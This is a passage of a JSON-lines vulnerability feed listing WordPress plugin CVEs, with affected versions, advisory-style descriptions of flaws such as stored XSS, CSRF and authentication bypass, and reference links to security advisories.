replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-management-system\\\/trunk\\\/admin\\\/class-library-management-system-admin.php#L2092\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-management-system\\\/trunk\\\/admin\\\/class-library-management-system-admin.php#L2092\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee792903-3b55-4f1d-bba1-59ea3f1826a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee792903-3b55-4f1d-bba1-59ea3f1826a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0897","slug":"modal-window","versionImpact":"6.1.5","description":"The Modal Window \u2013 create popup modal window plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'iframeBox' shortcode in all versions up to, and including, 6.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/trunk\\\/public\\\/class-shortcodes.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/trunk\\\/public\\\/class-shortcodes.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243077\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243077\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modal-window\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modal-window\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de4dfcc7-fcc0-46e5-8452-98783007368d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de4dfcc7-fcc0-46e5-8452-98783007368d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5538","slug":"bns-featured-category","versionImpact":"2.8.2","description":"The BNS Featured Category plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bnsfc' shortcode in all versions up to, and including, 2.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bns-featured-category\\\/trunk\\\/bns-featured-category.php#L1060\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bns-featured-category\\\/trunk\\\/bns-featured-category.php#L1060\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9a9bec8-7a76-4819-91c7-d9fdae3d94de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9a9bec8-7a76-4819-91c7-d9fdae3d94de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4777","slug":"bootstrap-shortcodes","versionImpact":"3.4.0","description":"The Bootstrap Shortcodes WordPress plugin through 3.4.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4c53bef-e868-46f1-965d-720b5b9a931e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4c53bef-e868-46f1-965d-720b5b9a931e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4377","slug":"doneren-met-mollie","versionImpact":"2.8.5","description":"The Doneren met Mollie plugin for WordPress is vulnerable to Sensitive Data Exposure in versions up to, and including, 2.8.5 via the dmm_export_donations() function which is called via the admin_post_dmm_export hook due to missing capability checks. This can allow authenticated attackers to extract a CSV file that contains sensitive information about the donors.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2459548\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2459548\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/information-disclosure-vulnerability-fixed-in-wordpress-doneren-met-mollie-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/information-disclosure-vulnerability-fixed-in-wordpress-doneren-met-mollie-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36afc442-9634-498e-961e-4c935880cd2b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36afc442-9634-498e-961e-4c935880cd2b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed99a056-42c6-4540-950e-12f8b547b64d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed99a056-42c6-4540-950e-12f8b547b64d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2834","slug":"bookit","versionImpact":"2.3.7","description":"The BookIt plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.3.7. This is due to insufficient verification on the user being supplied during booking an appointment through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","refs":"[{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/0dea1346-fd60-4338-8af6-6f89c29075d4\\\/\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/0dea1346-fd60-4338-8af6-6f89c29075d4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd32e46-a4fc-4c10-b546-9f9da75db791?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd32e46-a4fc-4c10-b546-9f9da75db791?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookit\\\/tags\\\/2.3.6\\\/includes\\\/classes\\\/CustomerController.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookit\\\/tags\\\/2.3.6\\\/includes\\\/classes\\\/CustomerController.php#L27\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925153\\\/bookit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925153\\\/bookit\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookit\\\/tags\\\/2.3.6\\\/includes\\\/classes\\\/database\\\/Customers.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookit\\\/tags\\\/2.3.6\\\/includes\\\/classes\\\/database\\\/Customers.php#L63\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2919529\\\/bookit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2919529\\\/bookit\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/06\\\/stylemixthemes-addresses-authentication-bypass-vulnerability-in-bookit-wordpress-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/06\\\/stylemixthemes-addresses-authentication-bypass-vulnerability-in-bookit-wordpress-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2448","slug":"userpro","versionImpact":"5.1.4","description":"The UserPro plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'userpro_shortcode_template' function in versions up to, and including, 5.1.4. This makes it possible for unauthenticated attackers to perform arbitrary shortcode execution. An attacker can leverage CVE-2023-2446 to get sensitive information via shortcode.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cbe9175-4a6f-4eb6-8d31-9a9fda9b4f40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cbe9175-4a6f-4eb6-8d31-9a9fda9b4f40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0698","slug":"easyappointments","versionImpact":"1.3.1","description":"The Easy!Appointments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easyappointments\\\/trunk\\\/public\\\/class-easyappointments-public.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easyappointments\\\/trunk\\\/public\\\/class-easyappointments-public.php#L141\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2468","slug":"embedpress","versionImpact":"3.9.12","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the EmbedPress widget 'embedpress_pro_twitch_theme ' attribute in all versions up to, and including, 3.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce3f1310-4d2e-45aa-a3ee-3972a6a31c2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce3f1310-4d2e-45aa-a3ee-3972a6a31c2e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0893","slug":"schema-app-structured-data-for-schemaorg","versionImpact":"2.1.0","description":"The Schema App Structured Data plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the MarkupUpdate function in all versions up to, and including, 2.1.0. This makes it possible for authenticated attackers, with subscriber access or higher, to update or delete post metadata.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1089ab17-b780-4840-8dcd-c50258513634?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1089ab17-b780-4840-8dcd-c50258513634?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-app-structured-data-for-schemaorg\\\/trunk\\\/lib\\\/SchemaEditor.php#L327\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-app-structured-data-for-schemaorg\\\/trunk\\\/lib\\\/SchemaEditor.php#L327\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3925","slug":"bdthemes-element-pack-lite","versionImpact":"5.6.7","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Creative Button widget in all versions up to, and including, 5.6.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263dd246-32ed-4efc-b7a6-ee6c9d305f89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263dd246-32ed-4efc-b7a6-ee6c9d305f89?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5880","slug":"hide-my-site","versionImpact":"2.2","description":"The Hide My Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2 due to the plugin not restricting access to the REST API when password protection is enabled. This makes it possible for unauthenticated attackers to gain unauthorized access to the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31d2ccd2-d38b-4bdf-a905-a2b54ca80a58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31d2ccd2-d38b-4bdf-a905-a2b54ca80a58?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hide-my-site\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hide-my-site\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11098","slug":"svg-block","versionImpact":"1.1.24","description":"The SVG Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.1.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79cc1f11-9b53-4e71-b0cc-8f8ebd4a5f32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79cc1f11-9b53-4e71-b0cc-8f8ebd4a5f32?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188270\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188270\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13888","slug":"wpappninja","versionImpact":"11.56","description":"The WPMobile.App plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 11.56. This is due to insufficient validation on the redirect URL supplied via the 'redirect' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243366\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243366\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpappninja\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpappninja\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a139f0fc-f3e0-4759-aa8d-ba138e5ccc87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a139f0fc-f3e0-4759-aa8d-ba138e5ccc87?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5536","slug":"wp-freemind","versionImpact":"1.0","description":"The Freemind Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'freemind' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-freemind\\\/trunk\\\/wp-freemind.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-freemind\\\/trunk\\\/wp-freemind.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70eaf9b8-67a0-4e98-b65c-aea61b20b448?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70eaf9b8-67a0-4e98-b65c-aea61b20b448?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4764","slug":"simple-file-downloader","versionImpact":"1.0.4","description":"The Simple File Downloader WordPress plugin through 1.0.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/788c6aa2-14cc-411f-95e8-5994f8c82d70\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/788c6aa2-14cc-411f-95e8-5994f8c82d70\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4376","slug":"woo-multi-currency","versionImpact":"2.1.17.","description":"The WooCommerce Multi Currency plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.1.17. This makes it possible for authenticated attackers to change the price of a product to an arbitrary value.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8a490c6-14c1-4c71-b44c-1e362cc892a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8a490c6-14c1-4c71-b44c-1e362cc892a8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/480125bc-bab3-45b8-9325-a4d406655a61\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/480125bc-bab3-45b8-9325-a4d406655a61\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2734576%40woo-multi-currency&new=2734576%40woo-multi-currency&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2734576%40woo-multi-currency&new=2734576%40woo-multi-currency&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-multi-currency\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-multi-currency\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4387","slug":"opal-estate","versionImpact":"1.6.11","description":"The Opal Estate plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.11. This is due to missing or incorrect nonce validation on the opalestate_set_feature_property() and opalestate_remove_feature_property() functions. This makes it possible for unauthenticated attackers to set and remove featured properties via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate\\\/trunk\\\/inc\\\/ajax-functions.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate\\\/trunk\\\/inc\\\/ajax-functions.php#L177\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2645899c-2b6b-48bd-8f33-2a837a951c5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2645899c-2b6b-48bd-8f33-2a837a951c5e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3366","slug":"multiparcels-shipping-for-woocommerce","description":"The MultiParcels Shipping For WooCommerce WordPress plugin before 1.15.2 does not have a CSRF check when deleting a shipment, allowing attackers to make any logged-in user delete arbitrary shipments via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2f06223-9352-4227-ae94-32061e2c5611\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2f06223-9352-4227-ae94-32061e2c5611\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2440","slug":"userpro","versionImpact":"5.1.1","description":"The UserPro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.1. This is due to missing nonce validation in the 'admin_page', 'userpro_verify_user' and 'verifyUnverifyAllUsers' functions. This makes it possible for unauthenticated attackers to modify the role of verified users to elevate verified user privileges to that of any user such as 'administrator' via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73600498-f55c-4b8e-a625-4f292e58e0ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73600498-f55c-4b8e-a625-4f292e58e0ee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1989","slug":"sassy-social-share","versionImpact":"3.3.58","description":"The Social Sharing Plugin \u2013 Sassy Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Sassy_Social_Share' shortcode in all versions up to, and including, 3.3.58 due to insufficient input sanitization and output escaping on user supplied attributes such as 'url'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdceb07a-87d2-4708-b76b-5a8fcfff0818?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdceb07a-87d2-4708-b76b-5a8fcfff0818?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-shortcodes.php#L228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-shortcodes.php#L228\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-shortcodes.php#L308\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-shortcodes.php#L308\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/public\\\/class-sassy-social-share-public.php#L513\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/public\\\/class-sassy-social-share-public.php#L513\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-sharing-networks.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/trunk\\\/includes\\\/class-sassy-social-share-sharing-networks.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044857%40sassy-social-share%2Ftrunk&old=3038976%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3044857%40sassy-social-share%2Ftrunk&old=3038976%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file6\",\"refsource\":\"\",\"tags\":[]}]"}
